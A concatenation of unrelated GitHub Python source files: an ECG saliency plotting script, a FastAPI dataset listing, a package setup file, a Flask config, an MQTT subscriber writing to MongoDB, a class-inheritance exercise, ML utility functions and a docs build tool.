[batch_size, num_cls]\n y_pred {tensor} -- model's output, shape of [batch_size, num_cls]\n\n Keyword Arguments:\n gamma {float} -- (default: {2.0})\n alpha {float} -- (default: {4.0})\n\n Returns:\n [tensor] -- loss.\n \"\"\"\n epsilon = 1.e-9\n y_true = tf.convert_to_tensor(y_true, tf.float32)\n y_pred = tf.convert_to_tensor(y_pred, tf.float32)\n\n model_out = tf.add(y_pred, epsilon)\n ce = tf.multiply(y_true, -tf.math.log(model_out))\n weight = tf.multiply(y_true, tf.pow(tf.subtract(1., model_out), gamma))\n fl = tf.multiply(alpha, tf.multiply(weight, ce))\n reduced_fl = tf.reduce_max(fl, axis=1)\n return tf.reduce_mean(reduced_fl)\n return focal_loss_fixed\n\n#Function which normalizes the ECG signal\ndef normalize(ecg_signal):\n max_value = max(ecg_signal)\n min_value = min(ecg_signal)\n\n range_values = max_value - min_value\n\n if range_values == 0:\n return ecg_signal\n\n normalised = [(x - min_value)/range_values for x in ecg_signal]\n\n return [a * -50 for a in normalised]\n #return [np.float32(a) for a in normalised]\n\nmodel_location = 'saved_models\\\\cnn_hannun\\\\cnn_model'\nmodel = tf.keras.models.load_model(model_location)\n#model = tf.keras.models.load_model(model_location, custom_objects={'focal_loss_fixed': focal_loss()})\n\nprint(model.summary())\n\ntwo_leads = 1\n\nfilename = \"./mit_bih_processed_data_two_leads_r_marker/A/ecg_7.txt\"\nf = open(filename, \"r\")\necg = []\nfor i,line in enumerate(f):\n line = line.replace(\"\\n\",\"\")\n #ECG signal stored in first line separated by spaces\n if i < 1:\n line_segments = line.split()\n\n r_value = line_segments[-1]\n r_value = int(r_value)\n del line_segments[-1]\n\n if two_leads == 0:\n line_segments = line_segments[:430]\n line_segments = [float(x) for x in line_segments]\n\n for item in line_segments:\n ecg.append(item)\nf.close()\n\necg_original = ecg.copy()\n\n#make one lead\n#ecg = ecg[:430]\n\ncutoff = 90\norder = 5\nfs = 
360.0\n\n#ecg_plot_filtered = butter_highpass_filter(ecg, cutoff, fs, order)\n#ecg_plot_filtered = butter_lowpass_filter(ecg, cutoff, fs, order)\necg_plot_filtered = normalize(ecg)\n\nplt.plot(ecg)\nplt.plot(ecg_plot_filtered)\nplt.title(\"Raw ECG\")\nplt.legend(['Original','Filtered'])\nplt.figure()\n\necg = [np.asarray(item) for item in ecg]\necg_plot_filtered = np.array(ecg_plot_filtered)\n\necg = np.array(ecg)\n\necg = ecg[:, np.newaxis]\necg = expand_dims(ecg, axis=0)\n\n# feature_maps = model.predict(ecg)\n# square = 20\n# for map_index,fmap in enumerate(feature_maps):\n# plt.suptitle(\"Feature Map, Layer \"+str(ixs[map_index]))\n# ix = 1\n# for _ in range(square):\n# ax = plt.subplot(square,1,ix)\n# ax.set_xticks([])\n# ax.set_yticks([])\n# plt.imshow(fmap[:,ix-1],cmap='gray')\n# ix += 1\n# plt.figure()\n\nfig, ax = plt.subplots(figsize=(18,2))\n\nsegment_names = [\"-A12\",\"-A11\",\"-A10\",\"-A9\",\"-A8\",\"-A7\",\"-A6\",\"-A5\",\"-A4\",\"-A3\",\"-A2\",\"-A1\",\"+A1\",\"+A2\",\"+A3\",\"+A4\",\"+A5\",\"+A6\",\"+A7\",\"+A8\",\"+A9\",\"+A10\",\"+A11\",\"+A12\",\"-B12\",\"-B11\",\"-B10\",\"-B9\",\"-B8\",\"-B7\",\"-B6\",\"-B5\",\"-B4\",\"-B3\",\"-B2\",\"-B1\",\"+B1\",\"+B2\",\"+B3\",\"+B4\",\"+B5\",\"+B6\",\"+B7\",\"+B8\",\"+B9\",\"+B10\",\"+B11\",\"+B12\"]\n\ndf_file = pd.read_csv(\"C:/Users/yolaj/Dropbox/PhD/My Papers/IEEE BIBE/csv files/segments_j.csv\")\nmean_gradients = df_file.iloc[-3]\nlower_quantile = df_file.iloc[-2]\nupper_quantile = df_file.iloc[-1]\n\nmean_gradients = mean_gradients.values.tolist()\ndel mean_gradients[0]\nmean_gradients = [float(x) for x in mean_gradients]\n\nlower_quantile = lower_quantile.values.tolist()\ndel lower_quantile[0]\nlower_quantile = [float(x) for x in lower_quantile]\n\nupper_quantile = upper_quantile.values.tolist()\ndel upper_quantile[0]\nupper_quantile = [float(x) for x in upper_quantile]\n\nplt.plot(mean_gradients, color=\"#4a86e8\")\nplt.fill_between(np.arange(0,len(mean_gradients),1), lower_quantile, upper_quantile, alpha=0.1, facecolor=\"#4a86e8\")\n\ndf_file = pd.read_csv(\"C:/Users/yolaj/Dropbox/PhD/My Papers/IEEE BIBE/csv files/segments_correct_j_predictions.csv\")\nmean_gradients = df_file.iloc[-3]\nlower_quantile = df_file.iloc[-2]\nupper_quantile = df_file.iloc[-1]\n\nmean_gradients = mean_gradients.values.tolist()\ndel mean_gradients[0]\nmean_gradients = [float(x) for x in mean_gradients]\n\nlower_quantile = lower_quantile.values.tolist()\ndel lower_quantile[0]\nlower_quantile = [float(x) for x in lower_quantile]\n\nupper_quantile = upper_quantile.values.tolist()\ndel upper_quantile[0]\nupper_quantile = [float(x) for x in upper_quantile]\n\nplt.plot(mean_gradients, color=\"#9900ff\")\nplt.fill_between(np.arange(0,len(mean_gradients),1), lower_quantile, upper_quantile, alpha=0.1, facecolor=\"#9900ff\")\n\ndf_file = pd.read_csv(\"C:/Users/yolaj/Dropbox/PhD/My Papers/IEEE BIBE/csv files/segments_incorrect_j_predictions.csv\")\ncounts = df_file.iloc[-4]\nmean_gradients = df_file.iloc[-3]\nlower_quantile = df_file.iloc[-2]\nupper_quantile = df_file.iloc[-1]\n\ncounts = counts.values.tolist()\ndel counts[0]\ncounts = [int(x) for x in counts]\n\nmean_gradients = mean_gradients.values.tolist()\ndel mean_gradients[0]\nmean_gradients = [float(x) for x in mean_gradients]\n\nlower_quantile = lower_quantile.values.tolist()\ndel lower_quantile[0]\nlower_quantile = [float(x) for x in lower_quantile]\n\nupper_quantile = upper_quantile.values.tolist()\ndel upper_quantile[0]\nupper_quantile = [float(x) for x in 
upper_quantile]\n\nplt.plot(mean_gradients, color=\"#00ffff\")\nplt.fill_between(np.arange(0,len(mean_gradients),1), lower_quantile, upper_quantile, alpha=0.1, facecolor=\"#00ffff\")\n\nplt.legend([\"Total\",\"Correct\",\"Incorrect\"])\n\nlabel_names = []\nfor index, item in enumerate(segment_names):\n label_names.append(str(item) +\"\\n\"+ str(counts[index]))\n\nplt.xticks(np.arange(0,len(mean_gradients),1),segment_names)\nax.tick_params(axis=\"x\",labelsize=8)\nplt.title(\"Median Values and 25% - 75% Quartile Per Segment, Junctional Escape Beats\")\nplt.figure()\n\nfig, ax = plt.subplots(figsize=(18,2))\nplt.plot(mean_gradients, color=\"#00ffff\")\nplt.fill_between(np.arange(0,len(mean_gradients),1), lower_quantile, upper_quantile, alpha=0.1, facecolor=\"#00ffff\")\n\nlabel_names = []\nfor index, item in enumerate(segment_names):\n label_names.append(str(item) +\"\\n\"+ str(counts[index]))\n\nplt.xticks(np.arange(0,len(mean_gradients),1),segment_names)\nax.tick_params(axis=\"x\",labelsize=8)\nplt.title(\"Median Values and 25% - 75% Quartile Per Segment, Incorrect Junctional Escape Beats vs Normal Beats\")\n\ndf_file = pd.read_csv(\"C:/Users/yolaj/Dropbox/PhD/My Papers/IEEE BIBE/csv files/segments_N.csv\")\nmean_gradients = df_file.iloc[-3]\nlower_quantile = df_file.iloc[-2]\nupper_quantile = df_file.iloc[-1]\n\nmean_gradients = mean_gradients.values.tolist()\ndel mean_gradients[0]\nmean_gradients = [float(x) for x in mean_gradients]\n\nlower_quantile = lower_quantile.values.tolist()\ndel lower_quantile[0]\nlower_quantile = [float(x) for x in lower_quantile]\n\nupper_quantile = upper_quantile.values.tolist()\ndel upper_quantile[0]\nupper_quantile = [float(x) for x in upper_quantile]\n\nplt.plot(mean_gradients, color=\"#9900ff\")\nplt.fill_between(np.arange(0,len(mean_gradients),1), lower_quantile, upper_quantile, alpha=0.1, facecolor=\"#9900ff\")\n\nplt.legend([\"Incorrectly Identified Junctional Escape Beats\",\"Normal Beats\"])\nplt.show()\n\ninterval = int(0.1 * 360) #0.1 seconds * sampling rate \n\nmean_values_a = []\nsegments_a = []\n\nend_index = r_value\nstart_column = \"-A\"\ni = 1\nwhile end_index > 0:\n\n column = start_column + str(i)\n mean_value = mean_gradients[column]\n mean_value = float(mean_value)\n\n mean_values_a.append(mean_value)\n \n start_index = end_index - interval\n\n if start_index < 0:\n start_index = 0\n segments_a.append([start_index, end_index])\n\n end_index = start_index\n\n i += 1\n\nmean_values_a.reverse()\nsegments_a.reverse()\n\nstart_index = r_value\nstart_column = \"+A\"\ni = 1\nwhile start_index < 430:\n\n column = start_column + str(i)\n mean_value = mean_gradients[column]\n mean_value = float(mean_value)\n\n mean_values_a.append(mean_value)\n \n end_index = start_index + interval\n\n if end_index > 430:\n end_index = 430\n segments_a.append([start_index, end_index])\n\n start_index = end_index\n\n i += 1\n\nmean_values_b = []\nsegments_b = []\n\nend_index = r_value\nstart_column = \"-B\"\ni = 1\nwhile end_index > 0:\n\n column = start_column + str(i)\n mean_value = mean_gradients[column]\n mean_value = float(mean_value)\n\n mean_values_b.append(mean_value)\n \n start_index = end_index - interval\n\n if start_index < 0:\n start_index = 0\n segments_b.append([start_index+430, end_index+430])\n\n end_index = start_index\n\n i += 1\n\nmean_values_b.reverse()\nsegments_b.reverse()\n\nstart_index = r_value\nstart_column = \"+B\"\ni = 1\nwhile start_index < 430:\n\n column = start_column + str(i)\n mean_value = mean_gradients[column]\n mean_value = 
float(mean_value)\n\n mean_values_a.append(mean_value)\n \n end_index = start_index + interval\n\n if end_index > 430:\n end_index = 430\n segments_b.append([start_index+430, end_index+430])\n\n start_index = end_index\n\n i += 1\n\nfor item in mean_values_b:\n mean_values_a.append(item)\n\nfor item in segments_b:\n segments_a.append(item)\n\nupsampling_factor = 25\n\nplot_grads = []\nfor index,item in enumerate(segments_a):\n\n mean_value = mean_values_a[index]\n\n start = item[0]\n end = item[1]\n\n if end == 860:\n end = 859\n #to make the plotting line segments happy, when I get to the end it plots to 860 and doesn't overflow\n\n print(start)\n print(end)\n print()\n\n plt.plot(np.arange(start,end+1,1),ecg_original[start:end+1],color=plt.cm.nipy_spectral(mean_value))\n\ncmap = plt.cm.ScalarMappable(cmap=plt.cm.nipy_spectral)\nfig.colorbar(cmap)\n\nplt.title(\"Saliency Map - Average Contribution Per Feature (Premature Ventricular Contraction)\")\nplt.grid(which='both')\nplt.minorticks_on()\n\nplt.show()","repo_name":"jonesy30/ECGClassification","sub_path":"plot_saliency_by_interval.py","file_name":"plot_saliency_by_interval.py","file_ext":"py","file_size_in_byte":11965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"19949789915","text":"from typing import Optional, Iterable\nfrom pydantic import BaseModel\nfrom fastapi import FastAPI\nfrom mtdata.entry import lang_pair\nfrom mtdata.index import Index, get_entries\nfrom mtdata.iso.bcp47 import bcp47, BCP47Tag\n\n\ndatasets = {str(entry.did): entry for entry in get_entries()}\n\n\napp = FastAPI()\n\n\nclass Entry(BaseModel):\n id: str\n group: str\n name: str\n version: str\n langs: List[str]\n\n\n@app.get(\"/datasets/by-language\")\n@app.get(\"/datasets/by-language/{lang1}\")\ndef list_languages(lang1:str = None) -> Iterable[str]:\n langs: set[str] = set()\n filter_lang = bcp47(lang1) if lang1 is not None else None\n for entry in Index.get_instance().get_entries():\n if filter_lang is not None and filter_lang not in entry.did.langs:\n continue\n langs.update(*entry.did.langs)\n return sorted(lang for lang in langs if lang is not None)\n\n\n@app.get(\"/datasets/by-language/{langs}\")\ndef list_datasets(langs:str) -> Iterable[Entry]:\n return (\n Entry(\n id = str(entry.did),\n group = entry.did.group,\n name = entry.did.name,\n version = entry.did.version,\n langs = entry.did.langs\n ) for entry in get_entries(lang_pair(langs))\n )\n\n\n@app.get(\"/datasets/{did}\")\ndef read_dataset(did: str):\n return datasets[did].did\n\n\n@app.get(\"/datasets/{did}/sample\")\ndef read_dataset(did: str):\n return datasets[did].did\n","repo_name":"miau1/empty-train","sub_path":"mtdata-stuff.py","file_name":"mtdata-stuff.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"7549427997","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"pythonfuzz\",\n version=\"1.0.10\",\n author=\"GitLab B.V.\",\n description=\"Coverage-guided fuzz testing for Python\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n install_requires=[\n # WARNING: Keep these values in line with those in requirements.txt\n \"psutil==5.6.3\",\n \"functools32==3.2.3.post2; python_version < '3'\",\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: Apache Software License\",\n 
\"Operating System :: OS Independent\",\n \"Topic :: Software Development :: Testing\"\n ],\n python_requires='>=3.5.3',\n packages=setuptools.find_packages('.', exclude=(\"examples\",))\n)\n","repo_name":"otter-sec/vyper-fuzz","sub_path":"pythonfuzz/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"24031119961","text":"\"\"\"nearal development configuration.\"\"\"\n\nimport pathlib\n\n# Root of this application, useful if it doesn't occupy an entire domain\nAPPLICATION_ROOT = '/'\n\n# Secret key for encrypting cookies\nSECRET_KEY = b'\\xd8\\x85\\r2\"R_\\xd1\\xcc\\xf8K\\xa9*\\xe894\\x84\\xbd;\\xb3rMr+'\nSESSION_COOKIE_NAME = 'login'\n\n# File Upload to var/uploads/\nNEARAL_ROOT = pathlib.Path(__file__).resolve().parent.parent\nUPLOAD_FOLDER = NEARAL_ROOT/'var'/'uploads'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\nMAX_CONTENT_LENGTH = 16 * 1024 * 1024\n\n","repo_name":"XinyunShen/advertisement-webpage","sub_path":"nearal/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74267903943","text":"# Read the Data from RPi Publisher (mqtt_pub.py) and pushes the data to MongoDB Server\n# Run this program on AWS Machine only\n\nimport paho.mqtt.client as mqtt\nfrom pymongo import MongoClient\n\n# create a client to connect with MongoDB Server\nmc=MongoClient('localhost',27017)\n\n# Connect with databse\ndb=mc['iotnitw']\n\n# Connect with collection\nc=db['sensorValues']\n\nbroker='172.31.29.90' # my private broker (change it to your private ip)\nport=1883\ntopic='nitw/iot'\n\n# create a client object\nclient=mqtt.Client()\n\n# connect with broker\nclient.connect(broker,port)\nprint('Broker Connected')\nid=1000\n\n# Subscribe\nclient.subscribe(topic)\n\n# notification\ndef mom(client,userdata,msg): # msg - {key:value} - {payload: your_msg}\n global id\n t=(msg.payload) # msg - object (rocket), payload - key holding a value (data)\n t=t.decode('utf-8')\n print(t)\n id+=1\n k={'_id':id,'moisture_sensor':t}\n c.insert_one(k)\n print('Document Inserted')\n\n# configure the notification\nclient.on_message=mom\n\n# execute this subscribe on an infinte loop\nclient.loop_forever()\n","repo_name":"maddydevgits/Dec20-NIT-W-FDP-Session","sub_path":"mqtt_sub_aws.py","file_name":"mqtt_sub_aws.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38970771840","text":"'''\nCreate a class called Employ have the data members empid, name\nDefined the display()\n\nSub class the Employ – call it as EmpDetails – have data members email Id, mobile number\n\nDefine the method emp_details_display()\n\nAgain sub class EmpDetails – call it as EmpDeptDetails – have data members – dept name and designation\n\n(example it can be Sales, Sales executive)\n\n \n\nCreate objects of EmpDeptDetails and display the output as following\n\n \n\nE1019 Ravi Kumar\n\nravi@gmail.com 9778845234\n\nSales , Sales executive\n\n'''\n\nclass Employ:\n def __init__(self,empid,name):\n self.empid=empid\n self.name=name\n def display(self):\n print(\"The Employee id is :\",self.empid)\n print(\"The Employee Name is :\",self.name)\nclass EmpDetails(Employ):\n def __init__(self,empid,name,email_id,mobile_number):\n super().__init__(empid,name)\n self.email_id=email_id\n 
self.mobile_number=mobile_number\n def emp_details_display(self):\n self.display()\n print(\"The Employee Email id is :\",self.email_id)\n print(\"The Employee Mobile Number is :\",self.mobile_number)\n \nclass EmpDeptDetails(EmpDetails):\n def __init__(self,empid,name,email_id,mobile_number,dept,designation):\n super().__init__(empid,name,email_id,mobile_number)\n \n self.dept=dept\n self.designation=designation\n def EmpDeptDetails_display(self):\n \n self.emp_details_display()\n print(\"The Employee Dept is :\",self.dept)\n print(\"The Employee designation in dept is :\",self.designation)\n \n \n#e=EmpDetails('E1019','Ravi Kumar','ravi@gmail.com',9778845234)\n#e.emp_details_display() \n \n \n#d=EmpDeptDetails('E1019','Ravi Kumar','ravi@gmail.com',9778845234,'Sales' , 'Sales executive')\n#d.EmpDeptDetails_display()\n\n'''\nOnce above program is working , create another class Salary having the data members as\nNumber of days worked, Net Salary\n\nThis Salary class should be aggregated to EmpDeptDetails (HAS A – relationship)\n\n \nThe output should come as\n \n\nE1229 Sundar Kumar\n\nsundar@gmail.com 9770045294\n\nPurchase , Purchase Manager\n\n28 , INR 56500\n\n'''\n\nclass Salary:\n def __init__(self,Number_of_days_worked,Net_Salary,empdd):\n self.Number_of_days_worked=Number_of_days_worked\n self.Net_Salary=Net_Salary\n self.empdd=empdd\n #self.edd=EmpDeptDetails('E1019','Ravi Kumar','ravi@gmail.com',9778845234,'Sales' , 'Sales executive') \n\n def Display(self):\n #self.edd=EmpDeptDetails('E1019','Ravi Kumar','ravi@gmail.com',9778845234,'Sales' , 'Sales executive')\n self.empdd.EmpDeptDetails_display()\n print('The number of days working by employee is :',self.Number_of_days_worked)\n print(\"The Net Salary of the employee is :\",self.Net_Salary)\n \nd=EmpDeptDetails('E1019','Ravi Kumar','ravi@gmail.com',9778845234,'Sales' , 'Sales executive')\n \nsal=Salary(28,'INR 56500',d)\n#sal.Display()\n\n\n'''\n3. 
Create 4-5 objects and store it in list called emp_list[]\n Display all the stored objects from the list\n'''\n\nd1=EmpDeptDetails('A2019','Rohit Sharma','rohit@gmail.com',9337788452,'Cricket' , 'Batsman')\n \nrsal=Salary(20,'INR 506500',d1) \n \n \nd2=EmpDeptDetails('D9019','Ms Dhoni','ms@gmail.com',8488245234,'Sports' , 'Captain')\n \ndsal=Salary(28,'INR 560500',d2) \n\nd3=EmpDeptDetails('K9119','Virat','v@gmail.com',6685445234,'Hockey' , 'Goal Keeper')\n \nksal=Salary(28,'INR 56500',d3)\n\nd4=EmpDeptDetails('H1019','Hardik','h@gmail.com',8824045234,'Crickt' , 'All rounder')\n \nhsal=Salary(28,'INR 406500',d4)\n \n\nemp_list=[sal,rsal,dsal,ksal,hsal]\n\nfor i in emp_list:\n i.Display() \n print('*'*100)\n\n \n \n ","repo_name":"Som94/Python-repo","sub_path":"29 july/Assignment 2.py","file_name":"Assignment 2.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73336685704","text":"import copy\nimport math\nimport random\nimport numpy as np\n\n\n\nfrom statistics import mean, stdev\nfrom collections import defaultdict\n\n\n\ndef Entropy(prob_X):\n \"\"\"\n This is the entropy function that computes\n entropy of a given random variables X\n and with their corresponding probabilities\n p_i based on the definition in:\n\n Shanon and Weaver, 1949\n\n -> Links to paper :\n --> http://math.harvard.edu/~ctm/home/text/others/shannon/entropy/entropy.pdf\n --> https://ieeexplore.ieee.org/document/6773024\n\n\n Entropy = Σ_i p_i * log2 (p_i)\n\n\n INPUT:\n -------\n prob_X (a list/array of vairables):\n\n it should contains all the probabilities of\n the underlying random variable, each element\n expected to be a (0 <= float) and should\n add up to 1. (Else will be normalized)\n\n\n\n OUTPUT:\n -------\n Entropy (float): Entropy bits\n \"\"\"\n import math\n _sum_ = 0\n\n _tot_ = 0\n # checks\n for prob in prob_X:\n assert prob >= 0, \"Negetive probability is not accepted!!!\"\n _tot_ += prob\n\n# if _tot_!=1:\n# print(\"Inputs are not normalized added up to {}, will be normalized!!\".format(_tot_))\n\n for prob in prob_X:\n if _tot_==0:\n continue\n\n prob = prob/_tot_\n if prob == 0:\n pass\n else:\n _sum_ += prob * math.log2(prob)\n\n return abs(_sum_)\n\n\ndef Boolean_Entropy(q):\n \"\"\"\n Finds the entropy for a Boolean random variable.\n\n INPUT:\n ------\n q (float) : is expected to be between 0 and 1 (else AssertionError)\n\n OUTPUT:\n -------\n Entropy (float) : Entropy of a throwing a coin with chances\n of P(H, T) = (q, 1 - q) in bits\n\n\n \"\"\"\n assert q >= 0 and q <= 1, \"q = {} is not between [0,1]!\".format(q)\n\n return Entropy([q, 1-q])\n\n\ndef Boolean_Entropy_counts(p, n):\n \"\"\"\n Finds the entropy for a Boolean random variable.\n\n INPUT:\n ------\n p (int or float) : Number or relative fraction of positive instances\n n (int or float) : Number or relative fraction of negative instances\n\n OUTPUT:\n -------\n Entropy (float) : Entropy of a throwing a coin with chances\n of P(H, T) = (q, 1 - q) in bits\n\n with q = p / (n + p)\n\n \"\"\"\n if n==0 and p==0:\n return 0\n q = p / (n + p)\n return Boolean_Entropy(q)\n\n\n\n\ndef Remainder_Entropy(Attr, outcome):\n\n set_of_distinct_values = set(Attr)\n\n count_distict_values = len(set_of_distinct_values)\n count_distict_outcomes = len(set(outcome))\n\n assert count_distict_outcomes <= 2, \"{} different outcomes but expected Boolean\"\n\n\n count_total_positives = len([i for i in outcome if i!=0])\n count_total_negatives = 
len(outcome) - count_total_positives\n\n import numpy as np\n\n Attr_np = np.array(Attr)\n outcome_np = np.array(outcome)\n\n _sum_ = 0\n\n for value in set_of_distinct_values:\n _outcome_ = outcome_np[Attr_np==value]\n count_positives = len([i for i in _outcome_ if i!=0])\n count_negatives = len(_outcome_) - count_positives\n\n _entropy_ = Boolean_Entropy_counts(count_positives, count_negatives)\n _weights_ = (count_positives + count_negatives)\n _weights_ = _weights_ / (count_total_positives + count_total_negatives)\n\n _sum_ += _weights_ * _entropy_\n\n return _sum_\n\n\n\ndef Information_Gain(Attr, outcome):\n count_total_positives = len([i for i in outcome if i!=0])\n count_total_negatives = len(outcome) - count_total_positives\n\n intital_entropy = Boolean_Entropy_counts(count_total_positives, count_total_negatives)\n remaining_entropy = Remainder_Entropy(Attr, outcome)\n\n info_gain = intital_entropy - remaining_entropy\n\n return info_gain\n\n\n\ndef euclidean_distance(X, Y):\n return math.sqrt(sum((x - y)**2 for x, y in zip(X, Y)))\n\n\ndef cross_entropy_loss(X, Y):\n n=len(X)\n return (-1.0/n)*sum(x*math.log(y) + (1-x)*math.log(1-y) for x, y in zip(X, Y))\n\n\ndef rms_error(X, Y):\n return math.sqrt(ms_error(X, Y))\n\n\ndef ms_error(X, Y):\n return mean((x - y)**2 for x, y in zip(X, Y))\n\n\ndef mean_error(X, Y):\n return mean(abs(x - y) for x, y in zip(X, Y))\n\n\ndef manhattan_distance(X, Y):\n return sum(abs(x - y) for x, y in zip(X, Y))\n\n\ndef mean_boolean_error(X, Y):\n return mean(int(x != y) for x, y in zip(X, Y))\n\n\ndef hamming_distance(X, Y):\n return sum(x != y for x, y in zip(X, Y))\n\n\ndef _read_data_set(data_file, skiprows=0, separator=None):\n with open(data_file, \"r\") as f:\n file = f.read()\n lines = file.splitlines()\n lines = lines[skiprows:]\n\n data_ = [[] for _ in range(len(lines))]\n\n for i, line in enumerate(lines):\n splitted_line = line.split(separator)\n float_line = []\n for value in splitted_line:\n try:\n value = float(value)\n except ValueError:\n if value==\"\":\n continue\n else:\n pass\n float_line.append(value)\n if float_line:\n data_[i] = float_line\n\n for line in data_:\n if not line:\n data_.remove(line)\n\n return data_\n\ndef unique(seq):\n \"\"\"\n Remove any duplicate elements from any sequence,\n works on hashable elements such as int, float,\n string, and tuple.\n \"\"\"\n return list(set(seq))\n\n\ndef remove_all(item, seq):\n \"\"\"Return a copy of seq (or string) with all occurrences of item removed.\"\"\"\n if isinstance(seq, str):\n return seq.replace(item, '')\n else:\n return [x for x in seq if x != item]\n\n\ndef weighted_sample_with_replacement(n, seq, weights):\n \"\"\"Pick n samples from seq at random, with replacement, with the\n probability of each element in proportion to its corresponding\n weight.\"\"\"\n sample = weighted_sampler(seq, weights)\n\n return [sample() for _ in range(n)]\n\n\ndef weighted_sampler(seq, weights):\n \"\"\"Return a random-sample function that picks from seq weighted by weights.\"\"\"\n import bisect\n\n totals = []\n for w in weights:\n totals.append(w + totals[-1] if totals else w)\n\n return lambda: seq[bisect.bisect(totals, random.uniform(0, totals[-1]))]\n\n\ndef mode(data):\n import collections\n \"\"\"Return the most common data item. 
If there are ties, return any one of them.\"\"\"\n [(item, count)] = collections.Counter(data).most_common(1)\n return item\n\n# argmin and argmax\n\nidentity = lambda x: x\n\nargmin = min\nargmax = max\n\n\ndef argmin_random_tie(seq, key=identity):\n \"\"\"Return a minimum element of seq; break ties at random.\"\"\"\n return argmin(shuffled(seq), key=key)\n\n\ndef argmax_random_tie(seq, key=identity):\n \"\"\"Return an element with highest fn(seq[i]) score; break ties at random.\"\"\"\n return argmax(shuffled(seq), key=key)\n\n\ndef shuffled(iterable):\n \"\"\"Randomly shuffle a copy of iterable.\"\"\"\n items = list(iterable)\n random.shuffle(items)\n return items\n\ndef check_equal(iterator):\n iterator = iter(iterator)\n try:\n first = next(iterator)\n except StopIteration:\n return True\n return all(first == rest for rest in iterator)\n\ndef probability(p):\n \"\"\"Return true with probability p.\"\"\"\n return p > random.uniform(0.0, 1.0)\n\n\n\ndef Measure_accuracy(true_values, predictions):\n _sum_ = 0\n for truth, prediction in zip(true_values, predictions):\n if truth==prediction:\n _sum_+=1\n return _sum_/len(predictions)\n\n# Kernels for the SVM\ndef gaussian_kernel(X1, X2, sigma):\n '''\n INPUT:\n -------\n X1 : shape (N examples, n features)\n X2 : shape (N examples, n features)\n sigma : Parameter for gaussian kernel (rbf)\n OUTPUT:\n -------\n kernel: shape (N examples, N examples)\n '''\n return np.exp((-(np.linalg.norm(X1[None, :, :] - X2[:, None, :], axis=2) ** 2)) / (2 * sigma ** 2))\n\ndef linear_kernel(X1, X2, *args):\n '''\n INPUT:\n -------\n X1 : shape (N examples, n features)\n X2 : shape (N examples, n features)\n\n OUTPUT:\n -------\n kernel: shape (N examples, N examples)\n '''\n return np.tensordot(X2, X1, axes=(1, 1))\n","repo_name":"abtinshahidi/Foundation_applied_machine_learning","sub_path":"notebooks/week8/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":8266,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"14901910760","text":"\"\"\"Simple script that helps with the documentation build process.\n\nThis includes converting SVG files to PDF files and rendering parts of the\ndocumentation.\n\nSee the commandline help for details.\n\"\"\"\n\nimport abc\nimport argparse\nimport datetime\nimport glob\nimport os\nimport subprocess\nimport sys\nimport textwrap\nimport inspect\n\nimport jinja2\nimport yaml\n\n\ndef main():\n \"\"\"The main function of the application\"\"\"\n try:\n # Parse the command line arguments extracting the tool to use.\n args = _parse_args()\n\n # Create and run the tool passing in the provided options.\n all_build_tools = _get_build_tool_command_map()\n build_tool_type = all_build_tools[args.build_tool]\n build_tool = build_tool_type(args.source_dir)\n build_tool.run()\n return 0\n\n except Exception as ex:\n print(\"Error: {0}\".format(ex), file=sys.stderr)\n return 1\n\n\nclass BuildTool(metaclass=abc.ABCMeta):\n \"\"\"Base class for build tools.\"\"\"\n\n def __init__(self, source_dir):\n \"\"\"Initializes the build tool with the provided options.\n\n :param source_dir: The directory to run the build tool over.\n \"\"\"\n self._source_dir = source_dir\n\n @abc.abstractmethod\n def run(self):\n \"\"\"Runs the build tool.\"\"\"\n pass\n\n @classmethod\n @abc.abstractmethod\n def get_command_name(cls):\n \"\"\"Provides the user visible name of the build tool.\n\n :return: The name of the build tool to use on the command line options.\n \"\"\"\n 
pass\n\n\nclass SVGToPDFBuildTool(BuildTool):\n \"\"\"Converts SVG files to PDF files so they can be used by LaTeX.\n\n The PDF file keeps the same basename as the SVG. The original SVGs are kept\n and any existing PDFs with the same name are overwritten.\n \"\"\"\n\n @classmethod\n def get_command_name(cls):\n return \"convert-svg\"\n\n def run(self):\n svg_files = self._find_svgs(self._source_dir)\n\n for svg in svg_files:\n self._convert_svg_to_pdf(svg)\n\n @staticmethod\n def _find_svgs(directory):\n \"\"\"Find all SVG files in the provided directory and all subdirectories.\n\n :param directory: The directory to search for SVGs.\n :return: An enumerable of SVG file names.\n \"\"\"\n return glob.glob(os.path.join(directory, \"**\", \"*.svg\"), recursive=True)\n\n @staticmethod\n def _convert_svg_to_pdf(svg_name):\n \"\"\"Converts the SVG provided SVG to a PDF file.\n\n The PDF file keeps the same basename as the SVG. The original SVG is kept\n and any existing PDFs with the same name are overwritten.\n\n :param svg_name: The name of the SVG file to convert.\n \"\"\"\n print(\"Converting: {}\".format(svg_name))\n\n pdf_name = os.path.splitext(svg_name)[0] + \".pdf\"\n args = ['inkscape', '-z',\n '-f', svg_name,\n '--export-pdf={}'.format(pdf_name)]\n subprocess.run(args, check=True)\n\n\nclass TemplateDataInfo:\n \"\"\"Class that holds information about a template to render.\"\"\"\n\n def __init__(self, template, output, data_source):\n \"\"\"Creates a new template data class.\n\n :param template: Path to the template file.\n :param output: Name of the output file to render.\n :param data_source: Path to the file containing the template's data.\n \"\"\"\n self.template = template\n self.output = output\n self.data_source = data_source\n\n\nclass RenderTemplatesBuildTool(BuildTool):\n \"\"\"Renders templates to output files using the Jinja templating 